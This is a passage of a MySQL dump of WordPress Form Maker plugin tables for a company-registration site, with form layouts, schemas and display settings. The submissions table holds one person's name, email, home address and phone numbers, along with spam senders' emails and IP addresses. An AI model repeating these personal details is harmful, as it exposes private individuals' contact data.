Occurs before the form is loaded\r\nfunction before_load() {	\r\n}	\r\n// Occurs just before submitting  the form\r\nfunction before_submit() {\r\n	// IMPORTANT! If you want to interrupt (stop) the submitting of the form, this function should return true. You don\'t need to return any value if you don\'t want to stop the submission.\r\n}	\r\n// Occurs just before resetting the form\r\nfunction before_reset() {	\r\n}','','',1,'%all%','%all%',4,1,'1#**id**#The being business to registered is a:#**label**#type_radio#****#2#**id**#custom_2#**label**#type_editor#****#3#**id**#Does the company have more than 1 shareholders:#**label**#type_radio#****##**id**##**label**##****#','1#**id**#The being business to registered is a:#**label**#type_radio#****#2#**id**#custom_2#**label**#type_editor#****#3#**id**#Does the company have more than 1 shareholders:#**label**#type_radio#****#','0','none','false','true','','','',0,'testmode','','',0,'1*:*id*:*type_radio*:*type*:*The being business to registered is a:*:*w_field_label*:*250*:*w_field_label_size*:*left*:*w_field_label_pos*:*left*:*w_field_option_pos*:*no*:*w_hide_label*:*ver*:*w_flow*:*For Profit company***Non-profit company***Professional company*:*w_choices*:*false***false***false*:*w_choices_checked*:*1*:*w_rowcol*:*yes*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*For Profit company***Non-profit company***Professional company*:*w_choices_value*:********:*w_choices_params*:**:*w_class*:**:*new_field*:*2*:*id*:*type_editor*:*type*:*custom_2*:*w_field_label*:*<ul><li>For profit company - a company that generates a profit for it\'s owners<br></li><li>Non-Profit company - a company that is a NGO or organisation where the profits/surplus are not distributed to any individual or entity<br data-mce-bogus=\"1\"></li><li>Professional company - a company registered by Lawyers, Doctors or Accountants<br data-mce-bogus=\"1\"></li></ul>*:*w_editor*:**:*new_field*:*3*:*id*:*type_radio*:*type*:*Does the company have more than 1 shareholders:*:*w_field_label*:*250*:*w_field_label_size*:*left*:*w_field_label_pos*:*left*:*w_field_option_pos*:*no*:*w_hide_label*:*ver*:*w_flow*:*Yes***No*:*w_choices*:*false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*Yes***No*:*w_choices_value*:*****:*w_choices_params*:**:*w_class*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,0,1,'','','','none',0),(98,0,18,'Getting Started','','','<div class=\"wdform-page-and-images\" style=\"display: table; border-width: 0px; border-top-style: solid; border-top-color: black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Untitled page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"1\" class=\"wdform_row ui-sortable-handle\" style=\"\">%1 - Name:%</div><div wdid=\"14\" class=\"wdform_row ui-sortable-handle\" style=\"\">%14 - Company Name%</div><div wdid=\"16\" class=\"wdform_row ui-sortable-handle\" style=\"\">%16 - Contact Person%</div><div wdid=\"15\" class=\"wdform_row ui-sortable-handle\" style=\"\">%15 - Contact Number%</div><div wdid=\"3\" class=\"wdform_row ui-sortable-handle\">%3 - Address:%</div><div wdid=\"9\" class=\"wdform_row ui-sortable-handle\" style=\"\">%9 - Is the company owner managed?%</div><div wdid=\"12\" class=\"wdform_row ui-sortable-handle\" style=\"\">%12 - custom_12%</div><div wdid=\"11\" class=\"wdform_row ui-sortable-handle\">%11 - Is there more then one shareholder?%</div><div wdid=\"13\" class=\"wdform_row ui-sortable-handle\">%13 - custom_13%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table; padding-top:10px;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',1,'// Occurs before the form is loaded\r\nfunction before_load() {	\r\n}	\r\n// Occurs just before submitting  the form\r\nfunction before_submit() {\r\n	// IMPORTANT! If you want to interrupt (stop) the submitting of the form, this function should return true. You don\'t need to return any value if you don\'t want to stop the submission.\r\n}	\r\n// Occurs just before resetting the form\r\nfunction before_reset() {	\r\n}','','',1,'%all%','%all%',17,1,'1#**id**#Name:#**label**#type_name#****#14#**id**#Company Name#**label**#type_text#****#16#**id**#Contact Person#**label**#type_text#****#15#**id**#Contact Number#**label**#type_text#****#3#**id**#Street Address#**label**#type_address#****#4#**id**#Street Address Line 2#**label**#type_address#****#5#**id**#City#**label**#type_address#****#6#**id**#State / Province / Region#**label**#type_address#****#7#**id**#Postal / Zip Code#**label**#type_address#****#8#**id**#Country#**label**#type_address#****#9#**id**#Is the company owner managed?#**label**#type_radio#****#12#**id**#custom_12#**label**#type_editor#****#11#**id**#Is there more then one shareholder?#**label**#type_radio#****#13#**id**#custom_13#**label**#type_editor#****#2#**id**#Phone:#**label**#type_phone#****##**id**##**label**##****#','1#**id**#Name:#**label**#type_name#****#14#**id**#Company Name#**label**#type_text#****#16#**id**#Contact Person#**label**#type_text#****#15#**id**#Contact Number#**label**#type_text#****#3#**id**#Street Address#**label**#type_address#****#4#**id**#Street Address Line 2#**label**#type_address#****#5#**id**#City#**label**#type_address#****#6#**id**#State / Province / Region#**label**#type_address#****#7#**id**#Postal / Zip Code#**label**#type_address#****#8#**id**#Country#**label**#type_address#****#9#**id**#Is the company owner managed?#**label**#type_radio#****#12#**id**#custom_12#**label**#type_editor#****#11#**id**#Is there more then one shareholder?#**label**#type_radio#****#13#**id**#custom_13#**label**#type_editor#****#','0','none','false','true','','','',0,'testmode','','',0,'1*:*id*:*type_name*:*type*:*Name:*:*w_field_label*:*200*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:***********:*w_first_val*:***********:*w_title*:*Title***First***Last***Middle*:*w_mini_labels*:*100*:*w_size*:*normal*:*w_name_format*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:*no***no*:*w_name_fields*:*no*:*w_autofill*:**:*new_field*:*14*:*id*:*type_text*:*type*:*Company Name*:*w_field_label*:*200*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*16*:*id*:*type_text*:*type*:*Contact Person*:*w_field_label*:*200*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*15*:*id*:*type_text*:*type*:*Contact Number*:*w_field_label*:*200*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*250*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*3*:*id*:*type_address*:*type*:*Address:*:*w_field_label*:*200*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*300*:*w_size*:*Street Address***Street Address Line 2***City***State / Province / Region***Postal / Zip Code***Country*:*w_mini_labels*:*no***no***no***no***no***no***no*:*w_disabled_fields*:*no*:*w_required*:*wdform_address*:*w_class*:**:*new_field*:*9*:*id*:*type_radio*:*type*:*Is the company owner managed?*:*w_field_label*:*400*:*w_field_label_size*:*top*:*w_field_label_pos*:*right*:*w_field_option_pos*:*no*:*w_hide_label*:*ver*:*w_flow*:*yes***no*:*w_choices*:*false***false*:*w_choices_checked*:*1*:*w_rowcol*:*yes*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*yes***no*:*w_choices_value*:*****:*w_choices_params*:**:*w_class*:**:*new_field*:*12*:*id*:*type_editor*:*type*:*custom_12*:*w_field_label*:*<p>Are you and the other directors / shareholders involved in running the business</p>*:*w_editor*:**:*new_field*:*11*:*id*:*type_radio*:*type*:*Is there more then one shareholder?*:*w_field_label*:*100*:*w_field_label_size*:*top*:*w_field_label_pos*:*left*:*w_field_option_pos*:*no*:*w_hide_label*:*ver*:*w_flow*:*yes***no*:*w_choices*:*false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*yes***no*:*w_choices_value*:*****:*w_choices_params*:**:*w_class*:**:*new_field*:*13*:*id*:*type_editor*:*type*:*custom_13*:*w_field_label*:*<p>is there more then one shareholder where one shareholder owns 50% and the other shareholders owns the other 50%<br>The shareholding percentage (%) will depend on your circumstance.&nbsp;</p>*:*w_editor*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,0,1,'Getting Started','','','none',0),(99,1,18,'Getting Started','','','<div class=\"wdform-page-and-images\" style=\"display: table; border-width: 0px; border-top-style: solid; border-top-color: black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Untitled page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"1\" class=\"wdform_row ui-sortable-handle\" style=\"\">%1 - Name:%</div><div wdid=\"14\" class=\"wdform_row ui-sortable-handle\" style=\"\">%14 - Company Name%</div><div wdid=\"16\" class=\"wdform_row ui-sortable-handle\" style=\"\">%16 - Contact Person%</div><div wdid=\"15\" class=\"wdform_row ui-sortable-handle\" style=\"\">%15 - Contact Number%</div><div wdid=\"3\" class=\"wdform_row ui-sortable-handle\">%3 - Address:%</div><div wdid=\"9\" class=\"wdform_row ui-sortable-handle\" style=\"\">%9 - Is the company owner managed?%</div><div wdid=\"12\" class=\"wdform_row ui-sortable-handle\" style=\"\">%12 - custom_12%</div><div wdid=\"11\" class=\"wdform_row ui-sortable-handle\" style=\"\">%11 - Is there more then one shareholder?%</div><div wdid=\"13\" class=\"wdform_row ui-sortable-handle\" style=\"\">%13 - custom_13%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table; padding-top:10px;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',1,'// Occurs before the form is loaded\r\nfunction before_load() {	\r\n}	\r\n// Occurs just before submitting  the form\r\nfunction before_submit() {\r\n	// IMPORTANT! If you want to interrupt (stop) the submitting of the form, this function should return true. You don\'t need to return any value if you don\'t want to stop the submission.\r\n}	\r\n// Occurs just before resetting the form\r\nfunction before_reset() {	\r\n}','','',1,'%all%','%all%',17,1,'1#**id**#Name:#**label**#type_name#****#14#**id**#Company Name#**label**#type_text#****#16#**id**#Contact Person#**label**#type_text#****#15#**id**#Contact Number#**label**#type_text#****#3#**id**#Street Address#**label**#type_address#****#4#**id**#Street Address Line 2#**label**#type_address#****#5#**id**#City#**label**#type_address#****#6#**id**#State / Province / Region#**label**#type_address#****#7#**id**#Postal / Zip Code#**label**#type_address#****#9#**id**#Is the company owner managed?#**label**#type_radio#****#12#**id**#custom_12#**label**#type_editor#****#11#**id**#Is there more then one shareholder?#**label**#type_radio#****#13#**id**#custom_13#**label**#type_editor#****#2#**id**#Phone:#**label**#type_phone#****##**id**##**label**##****#','1#**id**#Name:#**label**#type_name#****#14#**id**#Company Name#**label**#type_text#****#16#**id**#Contact Person#**label**#type_text#****#15#**id**#Contact Number#**label**#type_text#****#3#**id**#Street Address#**label**#type_address#****#4#**id**#Street Address Line 2#**label**#type_address#****#5#**id**#City#**label**#type_address#****#6#**id**#State / Province / Region#**label**#type_address#****#7#**id**#Postal / Zip Code#**label**#type_address#****#9#**id**#Is the company owner managed?#**label**#type_radio#****#12#**id**#custom_12#**label**#type_editor#****#11#**id**#Is there more then one shareholder?#**label**#type_radio#****#13#**id**#custom_13#**label**#type_editor#****#','0','none','false','true','','','',0,'testmode','','',0,'1*:*id*:*type_name*:*type*:*Name:*:*w_field_label*:*200*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:***********:*w_first_val*:***********:*w_title*:*Title***First***Last***Middle*:*w_mini_labels*:*100*:*w_size*:*normal*:*w_name_format*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:*no***no*:*w_name_fields*:*no*:*w_autofill*:**:*new_field*:*14*:*id*:*type_text*:*type*:*Company Name*:*w_field_label*:*200*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*16*:*id*:*type_text*:*type*:*Contact Person*:*w_field_label*:*200*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*15*:*id*:*type_text*:*type*:*Contact Number*:*w_field_label*:*200*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*250*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*3*:*id*:*type_address*:*type*:*Address:*:*w_field_label*:*200*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*300*:*w_size*:*Street Address***Street Address Line 2***City***State / Province / Region***Postal / Zip Code***Country*:*w_mini_labels*:*no***no***no***no***no***yes***no*:*w_disabled_fields*:*yes*:*w_required*:*wdform_address*:*w_class*:**:*new_field*:*9*:*id*:*type_radio*:*type*:*Is the company owner managed?*:*w_field_label*:*200*:*w_field_label_size*:*top*:*w_field_label_pos*:*right*:*w_field_option_pos*:*no*:*w_hide_label*:*ver*:*w_flow*:*yes***no*:*w_choices*:*false***false*:*w_choices_checked*:*1*:*w_rowcol*:*yes*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*yes***no*:*w_choices_value*:*****:*w_choices_params*:**:*w_class*:**:*new_field*:*12*:*id*:*type_editor*:*type*:*custom_12*:*w_field_label*:*<p>Are you and the other directors / shareholders involved in running the business</p><p><img class=\"wp-more-tag mce-wp-nextpage\" title=\"Next page\" src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" alt=\"\" data-wp-more=\"nextpage\" data-mce-resize=\"false\" data-mce-placeholder=\"1\"></p>*:*w_editor*:**:*new_field*:*11*:*id*:*type_radio*:*type*:*Is there more then one shareholder?*:*w_field_label*:*200*:*w_field_label_size*:*top*:*w_field_label_pos*:*left*:*w_field_option_pos*:*no*:*w_hide_label*:*ver*:*w_flow*:*yes***no*:*w_choices*:*false***false*:*w_choices_checked*:*1*:*w_rowcol*:*yes*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*yes***no*:*w_choices_value*:*****:*w_choices_params*:**:*w_class*:**:*new_field*:*13*:*id*:*type_editor*:*type*:*custom_13*:*w_field_label*:*<p>Is there more then one shareholder where one shareholder owns 50% and the other shareholders owns the other 50%<br>The shareholding percentage (%) will depend on your circumstance.&nbsp;<br><img class=\"wp-more-tag mce-wp-nextpage\" title=\"Next page\" src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" alt=\"\" data-wp-more=\"nextpage\" data-mce-resize=\"false\" data-mce-placeholder=\"1\"><br></p>*:*w_editor*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,0,1,'Getting Started','','','none',0);
/*!40000 ALTER TABLE `wpxb_formmaker_backup` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_formmaker_blocked`
--

DROP TABLE IF EXISTS `wpxb_formmaker_blocked`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_formmaker_blocked` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `ip` varchar(128) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_formmaker_blocked`
--

LOCK TABLES `wpxb_formmaker_blocked` WRITE;
/*!40000 ALTER TABLE `wpxb_formmaker_blocked` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpxb_formmaker_blocked` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_formmaker_display_options`
--

DROP TABLE IF EXISTS `wpxb_formmaker_display_options`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_formmaker_display_options` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `form_id` int(11) NOT NULL,
  `type` varchar(100) NOT NULL,
  `popover_animate_effect` varchar(255) NOT NULL,
  `popover_loading_delay` int(11) NOT NULL,
  `popover_frequency` int(4) NOT NULL,
  `topbar_position` tinyint(4) NOT NULL,
  `topbar_remain_top` tinyint(4) NOT NULL,
  `topbar_closing` tinyint(4) NOT NULL,
  `topbar_hide_duration` int(4) NOT NULL,
  `scrollbox_position` tinyint(4) NOT NULL,
  `scrollbox_trigger_point` float NOT NULL,
  `scrollbox_hide_duration` int(4) NOT NULL,
  `scrollbox_auto_hide` tinyint(4) NOT NULL,
  `scrollbox_closing` tinyint(4) NOT NULL DEFAULT 1,
  `scrollbox_minimize` tinyint(4) NOT NULL,
  `scrollbox_minimize_text` varchar(300) NOT NULL,
  `display_on` text NOT NULL,
  `posts_include` text NOT NULL,
  `pages_include` text NOT NULL,
  `display_on_categories` text NOT NULL,
  `current_categories` text NOT NULL,
  `scrollbox_loading_delay` tinyint(4) NOT NULL,
  `hide_mobile` tinyint(4) NOT NULL DEFAULT 1,
  `show_for_admin` tinyint(4) NOT NULL DEFAULT 1,
  PRIMARY KEY (`id`),
  UNIQUE KEY `form_id` (`form_id`)
) ENGINE=MyISAM AUTO_INCREMENT=21 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_formmaker_display_options`
--

LOCK TABLES `wpxb_formmaker_display_options` WRITE;
/*!40000 ALTER TABLE `wpxb_formmaker_display_options` DISABLE KEYS */;
INSERT INTO `wpxb_formmaker_display_options` VALUES (10,11,'embedded','none',0,0,1,1,1,0,1,20,0,1,1,1,'The form is minimized.','home,post,page','','','114,115,111,39,146,113,112,1,auto_check_new','114,115,111,39,146,113,112,1',0,0,0),(13,12,'embedded','',0,0,1,1,1,0,1,20,0,1,1,1,'Contact us','home,post,page','','','','',0,0,0),(15,14,'embedded','',0,0,1,1,1,0,1,20,0,1,1,1,'Choose Your Options','home,post,page','','','','',0,0,0),(17,16,'embedded','',0,0,1,1,1,0,1,20,0,1,1,1,'PAYE Registration','home,post,page','','','','',0,0,0),(18,17,'embedded','',0,0,1,1,1,0,1,20,0,1,1,1,'The form is minimized.','home,post,page','','','','',0,0,0),(19,18,'embedded','',0,0,1,1,1,0,1,20,0,1,1,1,'The form is minimized.','home,post,page','','','','',0,0,0),(20,19,'embedded','',0,0,1,1,1,0,1,20,0,1,1,1,'The form is minimized.','home,post,page','','','','',0,0,0);
/*!40000 ALTER TABLE `wpxb_formmaker_display_options` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_formmaker_query`
--

DROP TABLE IF EXISTS `wpxb_formmaker_query`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_formmaker_query` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `form_id` int(11) NOT NULL,
  `query` text NOT NULL,
  `details` text NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_formmaker_query`
--

LOCK TABLES `wpxb_formmaker_query` WRITE;
/*!40000 ALTER TABLE `wpxb_formmaker_query` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpxb_formmaker_query` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_formmaker_sessions`
--

DROP TABLE IF EXISTS `wpxb_formmaker_sessions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_formmaker_sessions` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `form_id` int(20) NOT NULL,
  `group_id` int(20) NOT NULL,
  `ip` varchar(20) NOT NULL,
  `ord_date` datetime NOT NULL,
  `ord_last_modified` datetime NOT NULL,
  `status` varchar(50) NOT NULL,
  `full_name` varchar(100) NOT NULL,
  `email` varchar(50) NOT NULL,
  `phone` varchar(50) NOT NULL,
  `mobile_phone` varchar(255) NOT NULL,
  `fax` varchar(255) NOT NULL,
  `address` varchar(300) NOT NULL,
  `paypal_info` text NOT NULL,
  `without_paypal_info` text NOT NULL,
  `ipn` varchar(20) NOT NULL,
  `checkout_method` varchar(20) NOT NULL,
  `tax` float NOT NULL,
  `shipping` float NOT NULL,
  `shipping_type` varchar(200) NOT NULL,
  `read` int(11) NOT NULL,
  `total` float NOT NULL,
  `currency` varchar(24) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_formmaker_sessions`
--

LOCK TABLES `wpxb_formmaker_sessions` WRITE;
/*!40000 ALTER TABLE `wpxb_formmaker_sessions` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpxb_formmaker_sessions` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_formmaker_submits`
--

DROP TABLE IF EXISTS `wpxb_formmaker_submits`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_formmaker_submits` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `form_id` int(11) NOT NULL,
  `element_label` varchar(128) NOT NULL,
  `element_value` longtext NOT NULL,
  `group_id` int(11) NOT NULL,
  `date` datetime NOT NULL,
  `ip` varchar(128) NOT NULL,
  `user_id_wd` int(11) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=117 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_formmaker_submits`
--

LOCK TABLES `wpxb_formmaker_submits` WRITE;
/*!40000 ALTER TABLE `wpxb_formmaker_submits` DISABLE KEYS */;
INSERT INTO `wpxb_formmaker_submits` VALUES (31,16,'1','Zainub@@@Mahomed',2,'2017-07-11 13:02:58','172.68.186.31',3),(32,16,'2','zainubmaw@gmail.com',2,'2017-07-11 13:02:58','172.68.186.31',3),(33,16,'14','PO Box 1881 Lenasia',2,'2017-07-11 13:02:58','172.68.186.31',3),(34,16,'3','010 5927717',2,'2017-07-11 13:02:58','172.68.186.31',3),(35,16,'16','0820808482',2,'2017-07-11 13:02:58','172.68.186.31',3),(36,16,'17','',2,'2017-07-11 13:02:58','172.68.186.31',3),(37,16,'5','MAW Inc',2,'2017-07-11 13:02:58','172.68.186.31',3),(38,16,'6','0000/0000/00',2,'2017-07-11 13:02:58','172.68.186.31',3),(39,16,'8','112 Rose Avuene',2,'2017-07-11 13:02:58','172.68.186.31',3),(40,16,'9','ext1',2,'2017-07-11 13:02:58','172.68.186.31',3),(41,16,'10','Lenasia',2,'2017-07-11 13:02:58','172.68.186.31',3),(42,16,'11','Gauteng',2,'2017-07-11 13:02:58','172.68.186.31',3),(43,16,'12','1827',2,'2017-07-11 13:02:58','172.68.186.31',3),(44,16,'13','South Africa',2,'2017-07-11 13:02:58','172.68.186.31',3),(45,16,'22','yes',2,'2017-07-11 13:02:58','172.68.186.31',3),(46,16,'20','07/11/2017',2,'2017-07-11 13:02:58','172.68.186.31',3),(47,16,'23','no',2,'2017-07-11 13:02:58','172.68.186.31',3),(48,16,'21','',2,'2017-07-11 13:02:58','172.68.186.31',3),(111,2,'1','Randy@@@Last',3,'2018-07-11 02:40:27','104.144.184.83',0),(112,2,'2','Randy@TalkWithLead.com',3,'2018-07-11 02:40:27','104.144.184.83',0),(113,2,'7','Hi,\r\n\r\nMy name is Randy and I was looking at a few different sites online and came across your site companyregistration.online.  I must say - your website is very impressive.  I found your website on the first page of the Search Engine. \r\n\r\nHave you noticed that 70 percent of visitors who leave your website will never return?  In most cases, this means that 95 percent to 98 percent of your marketing efforts are going to waste, not to mention that you are losing more money in customer acquisition costs than you need to.\r\n \r\nAs a business person, the time and money you put into your marketing efforts is extremely valuable.  So why let it go to waste?  Our users have seen staggering improvements in conversions with insane growths of 150 percent going upwards of 785 percent. Are you ready to unlock the highest conversion revenue from each of your website visitors?  \r\n\r\nTalkWithLead is a widget which captures a website visitor’s Name, Email address and Phone Number and then calls you immediately, so that you can talk to the Lead exactly when they are live on your website — while they&#039;re hot!\r\n  \r\nTry the TalkWithLead Live Demo now to see exactly how it works.  Visit: https://www.talkwithlead.com/Contents/LiveDemo.aspx\r\n\r\nWhen targeting leads, speed is essential - there is a 100x decrease in Leads when a Lead is contacted within 30 minutes vs being contacted within 5 minutes.\r\n\r\nIf you would like to talk to me about this service, please give me a call.  We do offer a 30 days free trial.  \r\n\r\nThanks and Best Regards,\r\nRandy',3,'2018-07-11 02:40:27','104.144.184.83',0),(114,2,'1','Kathy@@@Albert',4,'2018-08-18 10:58:59','146.196.32.95',0),(115,2,'2','kathylbrt@gmail.com',4,'2018-08-18 10:58:59','146.196.32.95',0),(116,2,'7','Hi\r\n\r\nWe can help your website to get on first page of Google and increase the number of leads and sales you are getting from your website. Please email us back for full proposal.\r\n\r\nBest Regards\r\nKathy\r\n',4,'2018-08-18 10:58:59','146.196.32.95',0);
/*!40000 ALTER TABLE `wpxb_formmaker_submits` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_formmaker_themes`
--

DROP TABLE IF EXISTS `wpxb_formmaker_themes`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_formmaker_themes` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `title` varchar(200) NOT NULL,
  `css` text NOT NULL,
  `default` tinyint(4) NOT NULL,
  `version` tinyint(4) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=15 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_formmaker_themes`
--

LOCK TABLES `wpxb_formmaker_themes` WRITE;
/*!40000 ALTER TABLE `wpxb_formmaker_themes` DISABLE KEYS */;
INSERT INTO `wpxb_formmaker_themes` VALUES (1,'Theme 1','{\"nonce_fm\":\"4d9bdd2902\",\"task\":\"\",\"params\":\"\",\"current_id\":\"1\",\"default\":\"1\",\"active_tab\":\"content\",\"title\":\"Theme 1\",\"GPFontFamily\":\"Abel\",\"AGPWidth\":\"100\",\"AGPSPWidth\":\"30\",\"AGPPadding\":\"15\",\"AGPMargin\":\"5 auto\",\"AGPBorderTop\":\"top\",\"AGPBorderRight\":\"right\",\"AGPBorderBottom\":\"bottom\",\"AGPBorderLeft\":\"left\",\"AGPBorderColor\":\"\",\"AGPBorderType\":\"solid\",\"AGPBorderWidth\":\"0\",\"AGPBorderRadius\":\"10\",\"AGPBoxShadow\":\"\",\"HPAlign\":\"top\",\"HPBGColor\":\"#2a9cdf\",\"HPWidth\":\"100\",\"HTPWidth\":\"40\",\"HPPadding\":\"10px 